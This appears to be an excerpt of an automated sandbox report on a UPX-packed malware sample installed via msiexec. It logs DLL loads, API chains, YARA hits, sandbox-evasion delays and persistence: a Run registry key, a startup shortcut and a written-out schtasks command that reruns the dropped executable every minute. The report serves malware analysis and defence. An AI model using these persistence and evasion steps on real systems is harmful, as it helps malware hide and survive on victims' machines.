                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: version.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: wsock32.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                Source: PAITNR.lnk.3.drLNK file: ..\..\..\..\..\Windata\ELJQZX.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_008DA0C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,3_2_008DA0C0
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_008005A8 push ss; ret 3_2_008005A9
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_00797795 push ecx; ret 3_2_007977A8
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_003105A8 push ss; ret 8_2_003105A9
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002A7795 push ecx; ret 8_2_002A77A8
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1

                Persistence and Installation Behavior

                barindex
                Drops executables to the windows directory (C:\Windows) and starts them
                Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI77F6.tmpJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpFile created: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI77F6.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI77F6.tmpJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1
                Source: C:\Windows\Installer\MSI77F6.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PAITNR.lnkJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PAITNRJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PAITNRJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0078F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_0078F78E
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007D7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_007D7F0E
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_0029F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,8_2_0029F78E
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002E7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,8_2_002E7F0E
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_00791E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00791E5A
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpWindow / User API: threadDelayed 5387Jump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpWindow / User API: foregroundWindowGot 1288Jump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpAPI coverage: 6.4 %
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeAPI coverage: 3.7 %
                Source: C:\Windows\Installer\MSI77F6.tmp TID: 6972Thread sleep time: -53870s >= -30000sJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Installer\MSI77F6.tmpThread sleep count: Count: 5387 delay: -10Jump to behavior
                Source: Yara matchFile source: 00000006.00000002.3415165237.0000000003288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3418899166.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3414950251.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3415165237.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSI77F6.tmp PID: 3192, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 2732, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\PAITNR.vbs, type: DROPPED
                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0078DD92 GetFileAttributesW,FindFirstFileW,FindClose,3_2_0078DD92
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_007C2044
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_007C219F
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_007C24A9
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,3_2_007B6B3F
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,3_2_007B6E4A
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_007BF350
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007BFD47 FindFirstFileW,FindClose,3_2_007BFD47
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_007BFDD2
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002D2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_002D2044
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002D219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_002D219F
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002D24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_002D24A9
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002C6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,8_2_002C6B3F
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002C6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,8_2_002C6E4A
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002CF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_002CF350
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002CFD47 FindFirstFileW,FindClose,8_2_002CFD47
